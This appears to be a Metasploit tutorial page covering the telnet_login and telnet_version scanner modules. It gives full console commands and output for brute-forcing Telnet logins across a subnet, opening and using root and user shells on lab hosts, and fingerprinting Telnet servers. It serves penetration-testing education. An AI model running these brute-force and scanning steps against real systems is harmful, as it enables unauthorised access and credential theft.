Scanner Telnet Auxiliary Modules
a11y.text Scanner Telnet Auxiliary Modulestelnet_login
a11y.text telnet_loginThe telnet_login module will take a list of provided credentials and a range of IP addresses and attempt to login to any Telnet servers it encounters.
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
This auxiliary module allows you to pass credentials in a number of ways. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space. We will configure the scanner to use a short usernames file and a passwords file and let it run against our subnet.
msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
PASS_FILE => passwords.txt
msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_login) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf auxiliary(telnet_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(telnet_login) > run
[+] 192.168.1.116 - SUCCESSFUL LOGIN root : s00p3rs3ckret
[*] Command shell session 1 opened (192.168.1.101:50017 -> 192.168.1.116:23) at 2010-10-08 06:48:27 -0600
[+] 192.168.1.116 - SUCCESSFUL LOGIN admin : s00p3rs3ckret
[*] Command shell session 2 opened (192.168.1.101:41828 -> 192.168.1.116:23) at 2010-10-08 06:48:28 -0600
[*] Scanned 243 of 256 hosts (094% complete)
[+] 192.168.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin
[*] Command shell session 3 opened (192.168.1.101:49210 -> 192.168.1.56:23) at 2010-10-08 06:49:07 -0600
[*] Scanned 248 of 256 hosts (096% complete)
[*] Scanned 250 of 256 hosts (097% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
It seems that our scan has been successful and Metasploit has a few sessions open for us. Let’s see if we can interact with one of them.
msf auxiliary(telnet_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell TELNET root:s00p3rs3ckret (192.168.1.116:23) 192.168.1.101:50017 -> 192.168.1.116:23
2 shell TELNET admin:s00p3rs3ckret (192.168.1.116:23) 192.168.1.101:41828 -> 192.168.1.116:23
3 shell TELNET msfadmin:msfadmin (192.168.1.56:23) 192.168.1.101:49210 -> 192.168.1.56:23
msf auxiliary(telnet_login) > sessions -i 3
[*] Starting interaction with 3...
id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$ exit
exit
logout
[*] Command shell session 3 closed.
msf auxiliary(telnet_login) >
telnet_version
a11y.text telnet_versionFrom a network security perspective, one would hope that Telnet would no longer be in use as everything, including credentials is passed in the clear but the fact is, you will still frequently encounter systems running Telnet, particularly on legacy systems. The telnet_version auxiliary module will scan a subnet and fingerprint any Telnet servers that are running. We just need to pass a range of IPs to the module, set our THREADS value, and let it fly.
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as
msf auxiliary(telnet_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_version) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_version) > run
[*] 192.168.1.2:23 TELNET (GSM7224) \x0aUser:
[*] 192.168.1.56:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] 192.168.1.116:23 TELNET Welcome to GoodTech Systems Telnet Server for Windows NT/2000/XP (Evaluation Copy)\x0a\x0a(C) Copyright 1996-2002 GoodTech Systems, Inc.\x0a\x0a\x0aLogin username:
[*] Scanned 254 of 256 hosts (099% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >